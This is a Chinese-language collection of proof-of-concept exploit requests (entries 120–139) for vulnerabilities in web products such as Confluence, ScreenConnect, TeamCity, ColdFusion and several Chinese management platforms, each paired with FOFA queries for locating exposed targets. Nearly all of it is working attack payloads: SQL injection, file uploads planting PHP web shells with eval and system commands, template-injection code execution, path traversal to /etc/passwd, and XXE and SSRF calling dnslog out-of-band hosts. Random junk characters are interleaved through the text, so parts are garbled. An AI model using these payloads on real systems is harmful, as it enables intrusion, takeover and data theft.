1 @! l' Q# d+ I2 E( J) Y& gX-Remote-Addr: 1.1.1.1
# S/ [2 R* A3 J5 N" n, R, uTe: trailers' q# p6 b+ x4 U Q. P+ \; t: G
Connection: close0 M' \ ^8 r+ _8 } F# X
2 |/ j7 x+ C4 v) }- M- L
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456' f) @6 r0 Z U. e9 Z0 o# [: A% O
9 J' _1 b# z5 V- S6 h
; L4 M# I7 M4 f2 w; f! {0 ] A120. 北京百绰智能S40管理平台导入web.php任意文件上传
1 }, z* g' v g+ L* YCVE-2024-1253
! z9 C9 C+ E0 Z/ _/ A0 |' @FOFA:title="Smart管理平台"3 r! v5 k: X% g% S0 X: b
POST /useratte/web.php? HTTP/1.1
y, a& `8 t fHost: ip:port
# j- n- u; V- _3 e' UCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
5 U2 x# _- f, Z# ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
8 ^; H. {- j" {& ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 X- F6 o# I L7 A' ?7 U m, TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Y Z" s! m( x' v& f
Accept-Encoding: gzip, deflate1 G8 I2 E# N0 e
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% G8 M& n: q4 I' SContent-Length: 597! v( L$ b5 I+ B1 U- @! z4 k7 @
Origin: https://ip:port
5 H6 m' _4 i: S, ?Referer: https://ip:port/sysmanage/licence.php
6 N7 n0 m; k0 I1 x wUpgrade-Insecure-Requests: 19 L+ K/ ^* J$ e5 [
Sec-Fetch-Dest: document- S/ Q. |) P, d. t4 ^9 m3 o$ t
Sec-Fetch-Mode: navigate
, r1 q4 h' i$ I4 YSec-Fetch-Site: same-origin
* r( F$ n! G3 S! r x) s+ xSec-Fetch-User: ?17 V) I, B; e7 y. H
Te: trailers
# H: L) E a3 h9 S: _' p' F$ cConnection: close" j% n! G' a, i# G# P
6 Z, Y/ s; d2 G$ l4 T, ^0 f
-----------------------------42328904123665875270630079328
$ \2 R+ G" c% T3 v/ L; ?0 MContent-Disposition: form-data; name="file_upload"; filename="2.php"
/ v# p% E" _! @; oContent-Type: application/octet-stream& [! x* j4 ]" F+ A
. q I( T4 J4 w2 f
<?php phpinfo()?>
p/ [3 q, F2 k# m" w6 N J6 C-----------------------------42328904123665875270630079328
7 z* d) ~& e6 I( t4 `Content-Disposition: form-data; name="id_type"4 v$ w3 {; V/ f5 `# @5 O# T8 C6 |
! y' W1 D a9 @) E& l: L( a1
& V3 C" ~) p" }) A-----------------------------42328904123665875270630079328
. `( f0 a! p0 }7 U. a3 lContent-Disposition: form-data; name="1_ck"/ k/ }+ n* x X4 K3 Q
2 Q* [$ E; R6 e# X8 }& _2 m) ?
1_radhttp9 x4 z3 y. ~' z) e d- D
-----------------------------42328904123665875270630079328
3 x+ z0 n3 n& X) d) B1 VContent-Disposition: form-data; name="mode"1 I3 C5 s8 |9 {+ \- _2 ^# h
! R3 O: V- H/ I3 B4 O9 R. ^; E4 zimport0 @* i" \( C$ F2 Z& V! P( Y
-----------------------------423289041236658752706300793284 u$ ?$ p( x% t& [/ d v
2 r( F7 {5 V4 G6 h# A; _ h3 M1 h8 ?; _; T4 D
文件路径/upload/2.php
, ]+ n! ^9 Z, Q9 m# j. ?* a# {0 Y3 j( ^4 {
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
3 S/ z3 W4 M& rCVE-2024-19183 [6 X4 f8 q$ J+ F4 b0 D
FOFA:title="Smart管理平台"0 v/ l+ c% C2 z: g2 j9 X3 m+ k/ e! ]
POST /useratte/userattestation.php HTTP/1.1
# S. G5 }! ?! W1 T, W% x. Q* n7 v0 W! n" tHost: 192.168.40.130:8443
- |6 o/ K- C0 Y( bCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
- q1 R H' c) N. m+ aUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- x/ w% L& i9 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 H9 v' h' e8 E. ?7 I5 S3 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. B. B/ a/ I0 Z. ~: O. P
Accept-Encoding: gzip, deflate. d# x9 G$ d# F
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* M4 b7 }# \; K2 L: VContent-Length: 592
' I) U8 c5 f! c3 _Origin: https://192.168.40.130:8443
7 |+ m! \7 k6 ZUpgrade-Insecure-Requests: 1" Q$ E6 N) U, [, F: o
Sec-Fetch-Dest: document. C7 y) B; G: R
Sec-Fetch-Mode: navigate
+ Z; c% ` C3 Y# C% ~Sec-Fetch-Site: same-origin# R0 R7 i6 \8 A* _* y4 u
Sec-Fetch-User: ?1
x5 y$ y9 l7 FTe: trailers" G2 e6 y7 B# v% H3 o1 W! b% S/ I
Connection: close
" h) p& U- K; G, T- H6 h
2 o7 u" d* V) ` g( k$ _-----------------------------42328904123665875270630079328
# ]& l- n( x' v' p& h0 KContent-Disposition: form-data; name="web_img"; filename="1.php"
% B" f) H% F# c# ]Content-Type: application/octet-stream
' b/ G. K" c u9 L, ]- y6 ?& U; T5 O3 O+ n: t+ }% V! \8 r
<?php phpinfo();?>
8 T7 h' R5 w1 {) V- R-----------------------------42328904123665875270630079328- N# V c7 z8 w$ f: r6 i
Content-Disposition: form-data; name="id_type"
4 C5 R8 a, m3 ]5 t* N5 a( C9 F, ], N+ W R/ ~4 M+ U/ ^9 Z
1
: i' R0 l2 `# N. e: ~-----------------------------42328904123665875270630079328% H9 l9 J+ u6 t/ O! X m, m
Content-Disposition: form-data; name="1_ck"
" j( p: D1 j$ B- r1 B- {6 U; n, h; J. N5 Q, U6 B' g
1_radhttp
& O# z F3 O3 W-----------------------------42328904123665875270630079328 {! ]& K; c7 j6 V ]
Content-Disposition: form-data; name="hidwel"
$ @& U. k" { h# q2 _* Z2 s( d# Z1 I ]# M/ l/ H
set
$ I8 L1 @! C/ [: z% T5 w, B-----------------------------42328904123665875270630079328( e! y0 Z. E6 r2 t& Z6 W3 s% p7 ~
$ ^9 P- p' m) M" E( m" T
: A2 ?2 p1 y- h: m6 @boot/web/upload/weblogo/1.php1 G `' j) h+ r. X7 D
& }- z0 K. D/ K. |; a, Q( M122. 北京百绰智能s200管理平台/importexport.php sql注入" G# G9 v8 Y8 z3 L$ L* z
CVE-2024-27718FOFA:title="Smart管理平台"" v" o- `8 g2 _' r
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
% ?( ^8 `4 {( r/ ^5 j1 ]GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
6 \, N7 ] ~$ k& a: J3 Y- b, LHost: x.x.x.x
3 f, I* @, V* j' j/ T7 x, z+ eCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
( A& ], r4 q6 U9 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 Q6 D8 ?9 t- x2 b5 M2 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 y6 `2 E; S' D* \; `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ k7 a8 D4 D; c% ^/ ^
Accept-Encoding: gzip, deflate, br* P: Q6 A6 O \0 s/ ?
Upgrade-Insecure-Requests: 1' @+ }0 t/ ^9 }* d0 c" n' R& a: _
Sec-Fetch-Dest: document) Q& f; L$ p+ [0 ]4 r
Sec-Fetch-Mode: navigate
1 Y% d: V( ~' }! A4 s: M2 B/ QSec-Fetch-Site: none
+ [" x8 @/ S8 E N- [* _Sec-Fetch-User: ?14 r9 f. y1 T# o1 I S% \
Te: trailers
- o8 b5 h: C" h( `/ NConnection: close
, Y+ p2 \6 k/ c+ Q f; g% i8 y0 j" H" |: I/ Z0 e3 ~4 L% C
4 j3 h/ J$ q4 d, M6 L- Y. d, S123. Atlassian Confluence 模板注入代码执行! a" g1 O* c. F* J+ m# y$ u
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
0 n4 D$ a' d4 X& P" sPOST /template/aui/text-inline.vm HTTP/1.1
h, k" y4 r& i; i( Z; v, _Host: localhost:8090& G, _4 y7 S7 e5 J+ B( w3 @0 e
Accept-Encoding: gzip, deflate, br
( E, y" i% l' j$ u7 iAccept: */*4 M# }# `& g- c+ M5 l
Accept-Language: en-US;q=0.9,en;q=0.8
2 l- h3 o H( n N3 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
- g, k! Q" X/ b2 U% Q5 j3 W! {0 @Connection: close* S4 t" a& V1 H! b4 z
Content-Type: application/x-www-form-urlencoded
. d6 d8 F5 @/ t) W. Z. I& i
# ?4 g- k- n$ _* tlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
. A1 O' y H/ B8 a8 a P( Z
* b5 U3 k, N( ?( h. `( C7 e: k
+ d5 Z- i% F4 w124. 湖南建研工程质量检测系统任意文件上传% e- g5 G5 n+ {4 D8 E
FOFA:body="/Content/Theme/Standard/webSite/login.css"# |2 n" k: v; O4 v- {9 a
POST /Scripts/admintool?type=updatefile HTTP/1.1
) ] k [# ]: M' @. E2 F( N6 G; WHost: 192.168.40.130:8282! ^; @/ a' \7 P" G/ M n: f
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 \% v1 {! _; w. W4 y7 ^0 O1 S$ eContent-Length: 72
. Z! ?, S, Y+ r2 z8 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
/ }7 e$ F6 l" QAccept-Encoding: gzip, deflate, br4 [% R9 H9 O! u; ~* I% v4 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# }4 f. o/ Y: b: g
Connection: close
% y& a0 N! q" nContent-Type: application/x-www-form-urlencoded% I0 p5 j5 F, `* [4 m3 k. T) x z
, ~( t; z/ o# p* X
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
- k1 ^" ^: a8 U) D* ]; ]. Y$ t0 y& `+ l3 v
' T, c8 e4 a0 h( K. t$ [+ ghttp://192.168.40.130:8282/Scripts/abcgcg.aspx8 h3 t( h* I+ ?9 h
3 O+ ?( K$ t* \$ d# o125. ConnectWise ScreenConnect身份验证绕过
! p: B$ P0 u b" X3 A1 OCVE-2024-1709& K5 I' b; p; K% U5 L# W
FOFA:icon_hash="-82958153"
8 W3 T6 u, e" L8 x8 lhttps://github.com/watchtowrlabs ... bypass-add-user-poc
# u4 u" k, @1 a7 r' Q$ A
2 k2 B1 o+ t4 P' x( a, }: q
n" C1 r5 m4 S+ q4 S( d+ ?使用方法
, I+ }4 p3 B, a0 @6 Y2 H) R$ g$ opython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
7 i( q- ^0 y& J( B2 }- G3 J0 S" E: ^1 f
8 m a* V6 W. f% B5 q, ^* d
创建好用户后直接登录后台,可以执行系统命令。6 p4 g% e. D- n+ u- `
3 H, a( C H0 Y1 F& B6 k0 D$ V" n126. Aiohttp 路径遍历
9 s# c+ N5 _; P0 D1 u; O( ~FOFA:title=="ComfyUI"
0 W* u0 T8 L$ a! S+ \) DGET /static/../../../../../etc/passwd HTTP/1.15 c: |8 @. Z2 e. O
Host: x.x.x.x' B2 N: c2 y2 ^) X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* T! {3 S2 j S6 ~& R3 U- D. O0 H
Connection: close; ?0 d6 Z! X+ D; j
Accept: */* K! y! ~: g: d' Q5 _
Accept-Language: en
. m m. K+ b) R, I7 I4 YAccept-Encoding: gzip
' Z% Z6 w0 x7 ^; a' r: g7 o
3 \, w9 y/ t% r( ?- v$ Q. I6 x* Z' @0 B( K
127. 广联达Linkworks DataExchange.ashx XXE' i, s d% n' ]( a. G5 N
FOFA:body="Services/Identification/login.ashx" 4 H2 D* v* u( m1 I# x
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.13 u+ X( V9 f7 I" b, }
Host: 192.168.40.130:8888) v5 t: X d! F& O% h% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36' V; o' m1 L3 k3 `, K5 b
Content-Length: 415
7 u8 H/ S+ { qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ I ~0 b' Q" ?) [- X* H* SAccept-Encoding: gzip, deflate6 y) J: h: B: @" V" o* o8 H8 o, f
Accept-Language: zh-CN,zh;q=0.9
4 e& \# Z$ U6 ~. F P1 [ b* R! r/ yConnection: close7 J. X# i, j) n( j4 P
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe04 ]* `" p: [ e1 R
Purpose: prefetch
) J! C2 z& b; i) n! H) KSec-Purpose: prefetch;prerender
. i; H9 M9 ^/ K8 q. F% u6 z6 U& n1 g
------WebKitFormBoundaryJGgV5l5ta05yAIe0
6 X" g* [! o' d/ I' eContent-Disposition: form-data;name="SystemName"
2 A3 d$ r1 l4 P: C8 W- A: s' R' u
BIM
" v% |. Q1 u' C------WebKitFormBoundaryJGgV5l5ta05yAIe0
" \' y9 z e! V) V% c6 L8 a& ]Content-Disposition: form-data;name="Params"" _: B* e- H O& r5 [5 ]( a& u
Content-Type: text/plain5 p. i [0 J& y2 k; ]' v) `
t( o6 s' A* r% k7 O5 K- [<?xml version="1.0" encoding="UTF-8"?>$ M/ p% X" g: J8 y6 ]
<!DOCTYPE test [, X! o# w) W; W% V5 `
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">) s; p- [% c. j4 }
]
8 f1 b3 i2 Q' c5 p! Z>
4 ]( k5 s/ j% X" ^<test>&t;</test>
- r" m# N0 G* d% w------WebKitFormBoundaryJGgV5l5ta05yAIe0--! W. u- w+ `0 u4 J! i6 U* |
) F: f: n( @7 |3 ?; b/ V0 A& D+ P9 G, h: j
% c* v% _: J! G" @" e, r$ |. |128. Adobe ColdFusion 反序列化
* k" {& y+ E+ \* {7 c( B, @CVE-2023-382031 ?# E; r: S% k4 @; M7 p
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)4 y1 Z q" i7 a0 J+ \
FOFA:app="Adobe-ColdFusion"
- I" }0 d2 i( F4 gPAYLOAD
5 q! m7 {" F% M* I, k+ a! w: N
2 f% D3 o8 X- H* v2 C/ P5 u/ t129. Adobe ColdFusion 任意文件读取
1 j* K6 b7 l; T3 y: w* f5 L8 tCVE-2024-207679 e! q9 w. v7 y/ I2 k% Z5 X# F" C% C
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"0 E: w& o8 W; d0 k$ q' I% R
第一步,获取uuid5 R) R2 q4 Z! _ J$ |8 n, {
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1: e& e/ j5 V& I3 v' e
Host: x.x.x.x
# P7 j- a: u0 q, C. BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 u. \. `' C6 j9 ]) Q5 h4 m! ^Accept: */*
2 A0 v2 s1 f6 o4 c' `4 BAccept-Encoding: gzip, deflate: L7 ?7 b' |6 X3 y ?* t+ Q: m) `8 ^
Connection: close/ @6 G3 n% g4 w( y6 [+ S
. W2 r! p9 ^! \4 B' g0 O+ r& `6 e# p) e
第二步,读取/etc/passwd文件2 Q- I2 w' [0 P( |/ Q
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
0 i5 B0 \% A4 {; R5 x, |; FHost: x.x.x.x
/ { @& P0 [1 e% FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. I% L6 c5 D3 K/ }7 _
Accept: */*7 x2 y; p& } U" O" {! ^9 a
Accept-Encoding: gzip, deflate! W! v% V# M A
Connection: close
% b K: I0 w' @6 D1 R; [' [uuid: 85f60018-a654-4410-a783-f81cbd5000b9
& U* H D+ C+ B; m- Q: I
1 K) J( ]8 n8 b2 y5 N) B. ?5 ^' D+ y( E
130. Laykefu客服系统任意文件上传) I$ y9 d' o- g; L" w; x7 p4 [7 h
FOFA:icon_hash="-334624619"
+ v% x' `1 O# W4 o: _POST /admin/users/upavatar.html HTTP/1.14 |: a8 R$ t; q/ y. ~( A
Host: 127.0.0.1! C1 b# A m7 s! V8 A
Accept: application/json, text/javascript, */*; q=0.01# i8 i) R# V3 h- M& j
X-Requested-With: XMLHttpRequest! Z7 d* I5 `, h2 f. S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- Z5 ~+ q! ]$ }) I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
$ ?. t c4 a$ r, y5 P" ~+ ~' CAccept-Encoding: gzip, deflate1 ~9 r0 K/ c; c. b
Accept-Language: zh-CN,zh;q=0.9& ]+ J3 ^; B* ~9 Q6 [( k
Cookie: user_name=1; user_id=3/ [. P, [. g0 A! k) M
Connection: close( T# X X P% k, s) j4 @
* ]2 x- f5 u S$ T" z$ n. S+ P6 A' E------WebKitFormBoundary3OCVBiwBVsNuB2kR1 [. z) X- y: o+ |
Content-Disposition: form-data; name="file"; filename="1.php"
& u8 ?1 W; e3 Q* y- yContent-Type: image/png! f9 p6 h8 a! g( G
0 o7 c* ~* h) V K0 [& ?4 O<?php phpinfo();@eval($_POST['sec']);?>
! j9 e$ z+ R; x% Z------WebKitFormBoundary3OCVBiwBVsNuB2kR--* x/ T/ c1 t2 t1 u! E! O
1 S. Q$ `! @3 v7 y6 r
- J' d9 F# e/ m. o
131. Mini-Tmall <=20231017 SQL注入
R5 n8 S9 d x4 i( UFOFA:icon_hash="-2087517259"
8 E; F' X6 N6 H8 f后台地址:http://localhost:8080/tmall/admin9 e' A/ e/ o+ G& P# I! n
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)* h$ [0 Q2 \5 {. V: R& h0 t
' f! A/ F( _: U k8 j132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
$ d% r# V( M# E2 W& J* V* }7 XCVE-2024-27198
7 B2 g! L2 \* ]4 w% HFOFA:body="Log in to TeamCity"- s& O3 l, C# y2 e3 x9 h
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
; ~' s/ | K, }: bHost: 192.168.40.130:8111! z, \& G( X: ~* }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 O# |8 ?- M; G( ^# N6 J8 m
Accept: */*
/ ]+ ^: w0 z0 c+ G; g% O9 G! WContent-Type: application/json
/ [& Q" u# @5 z+ m. P r: zAccept-Encoding: gzip, deflate
# f! {5 y" l3 y9 o- k( G# a
/ j; L! W0 [: s, G6 E{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
0 j, H4 M! e- W+ W: H5 o
/ C1 ^, |7 b h' g8 R% A. l& V3 i. m- G, b# x
CVE-2024-27199* b. B4 c+ j2 P
/res/../admin/diagnostic.jsp
" u+ G- d# A9 u3 U: S- d6 ~/.well-known/acme-challenge/../../admin/diagnostic.jsp; ?/ |* w5 P" p
/update/../admin/diagnostic.jsp
) X1 F2 `0 L4 ~" U+ T* B) e$ b/ r0 |
" {6 m$ a. {2 R$ N @6 G/ O
CVE-2024-27198-RCE.py
8 p9 r# o3 l! i4 c" s% {! V
3 {; J; O' W9 G133. H5 云商城 file.php 文件上传, v8 b1 d3 e$ a( f3 {
FOFA:body="/public/qbsp.php"4 P6 X; V' I2 f2 W( G* W" i
POST /admin/commodtiy/file.php?upload=1 HTTP/1.13 y1 {- q2 N. [' p. k7 L6 e
Host: your-ip1 C- y5 b* y2 g/ _1 K% \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 z# I4 x8 Q+ {7 ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
- ~9 ?: _0 K% n# l/ Y- s0 m
2 [4 R& C$ R4 v, [$ X( U------WebKitFormBoundaryFQqYtrIWb8iBxUCx2 m% D @6 o( W4 Q0 Q }
Content-Disposition: form-data; name="file"; filename="rce.php"& i; S8 ~4 L5 Y3 _
Content-Type: application/octet-stream
- h9 y' J4 e' E _4 ^5 Y7 U O * K- }. w [2 t; Q0 `
<?php system("cat /etc/passwd");unlink(__FILE__);?>
( _( N7 E" g3 P8 Z4 o7 D------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
r% C# o# p' t( o
% P0 g. Y/ f* H5 ~4 D9 z; }( l9 E; B# Q( C
/ O" @7 D2 P& t* \" u/ s134. 网康NS-ASG应用安全网关index.php sql注入
4 K/ `- U2 r8 b z7 M; ~CVE-2024-23304 y! k5 E o C' |) [
Netentsec NS-ASG Application Security Gateway 6.3版本) z, \! k# |- D( l; G
FOFA:app="网康科技-NS-ASG安全网关"2 V" w8 f) F$ I# T% N4 b5 v
POST /protocol/index.php HTTP/1.1
% Y+ L, p3 `( h5 J- xHost: x.x.x.x5 I3 P! v2 S0 l2 b/ W1 o
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de( E. i* s1 I. k; K* Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# b' J1 F/ X a( h! ]8 n) FAccept: */*
5 A1 [- w6 D; i; qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ {+ ~. ^6 V, iAccept-Encoding: gzip, deflate, w. o* {1 L* U; s. j* a2 V8 B( K
Sec-Fetch-Dest: empty% ~& m- x5 L% K. a
Sec-Fetch-Mode: cors3 a5 B* z) J$ ]7 o i$ r
Sec-Fetch-Site: same-origin
9 C4 O* Y8 O+ Y) O5 ^* `8 bTe: trailers
w3 u% V0 q' u F* o$ _. VConnection: close
* v% p8 S% K5 Q9 PContent-Type: application/x-www-form-urlencoded" q0 J" }: \2 g
Content-Length: 263
) S( C6 n" d1 S- k0 E& H3 F; C: \" F
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}: ~% O1 ]- O0 N! W- D7 d$ S
% \. a- s- o0 z" t/ H5 x2 H5 o& E+ C- ]- q6 i! X: L$ i: H
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
# F2 R& ~2 U. |3 mCVE-2024-2022- x2 m/ i2 r- D: Z1 d
Netentsec NS-ASG Application Security Gateway 6.3版本
* V8 g9 E' P& hFOFA:app="网康科技-NS-ASG安全网关"
$ f6 T {! C. g( t0 f0 S8 ~; x& qGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1, b, s! s. W$ _
Host: x.x.x.x$ ~( n; F' p/ f# z: r! D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. z5 ]: R9 d6 H4 u. Z) A0 @4 x2 H; x D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 g0 v0 M9 d8 [. u1 a
Accept-Encoding: gzip, deflate8 M+ Y0 }3 [1 ^9 q- Q1 C
Accept-Language: zh-CN,zh;q=0.9
) W \5 |8 {5 C+ [0 G) i( \' d, eConnection: close
6 q, M. U* E1 j6 C+ W+ }
) {0 n8 u8 C, H" Q0 S3 C5 ?; ~7 I4 @. T- I* q; C( e
136. NextChat cors SSRF- w: O* i+ O7 M
CVE-2023-49785+ i1 J, I. {/ G( ?: y
FOFA:title="NextChat"
* Q- y% G* } |2 i4 CGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.11 I2 }" U# j% F1 v1 a3 p! j6 m! }
Host: x.x.x.x:10000/ l m8 h- c S, }9 D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ a; [5 s4 [% q, Z7 h, k
Connection: close$ B& X h- i" |5 A1 @
Accept: */** H1 A1 j$ n! L9 ^5 t% L
Accept-Language: en
0 V; l/ t3 ?, L# h4 r* h, I$ @' c! d; MAccept-Encoding: gzip
. v! Y& E8 v3 j7 Z1 N2 M1 n2 ~9 Y
$ r) A$ `0 K0 H4 E0 E+ j* z5 b) X* E/ f9 H& e) c$ v5 M
137. 福建科立迅通信指挥调度平台down_file.php sql注入
: T4 `1 b6 R) G. ^CVE-2024-2620/ a @) o+ ^( H& c* _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 Y0 \7 H& s, J- m& s4 D: [ ^0 o9 I+ O2 lGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1: J, D0 k0 h( _: F( H0 \4 v: l
Host: x.x.x.x
: r2 E( S8 V: O% d2 U+ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% l, z6 j- z( u8 d) W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 j3 _) a: n6 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% N8 u( q0 I, D6 l; |5 e7 _Accept-Encoding: gzip, deflate, br
/ O+ C6 i6 H; N; |) sConnection: close* F* l/ l# h' j, i. k: n2 [) C! o
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj2 G: z" g9 N, [+ q7 J6 {% S, I' L! i
Upgrade-Insecure-Requests: 1
: r, N5 j) N' \6 y% ~2 Y
" V# g! f9 M; F* T, m5 }& |( [" O/ \, c8 D
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- @& @/ @ |# g9 f3 E* ICVE-2024-2621* k( Z5 W( o! }1 f' Q" j) F, U( k
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"3 E: x; }, V7 M6 X; V3 R% x; `; K5 s
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1' z. D1 a" E% J3 i u S, E5 B0 u+ H
Host: x.x.x.x
- z6 U7 a( D9 {+ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. M% W: l" I6 ~- kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% |+ c# a2 h( \' C) D+ m* y6 h' S% KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 _2 r3 f0 _8 a" J) k, X7 A
Accept-Encoding: gzip, deflate, br
4 S8 {7 g% I5 b$ SConnection: close
* c4 f8 U. l- i9 H' D' G4 R# wUpgrade-Insecure-Requests: 1" R6 z: G7 `" g/ c: o( }
( e6 E l' f* _" y: \# ~ l4 \
8 D" K C3 M; Y" D& @: x' z9 u139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, c; _9 U" k, I0 a2 [CVE-2024-2622
; K& \" g6 u7 \- P3 B0 L$ {( DFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 ?: V) |% p5 w% J6 k& x
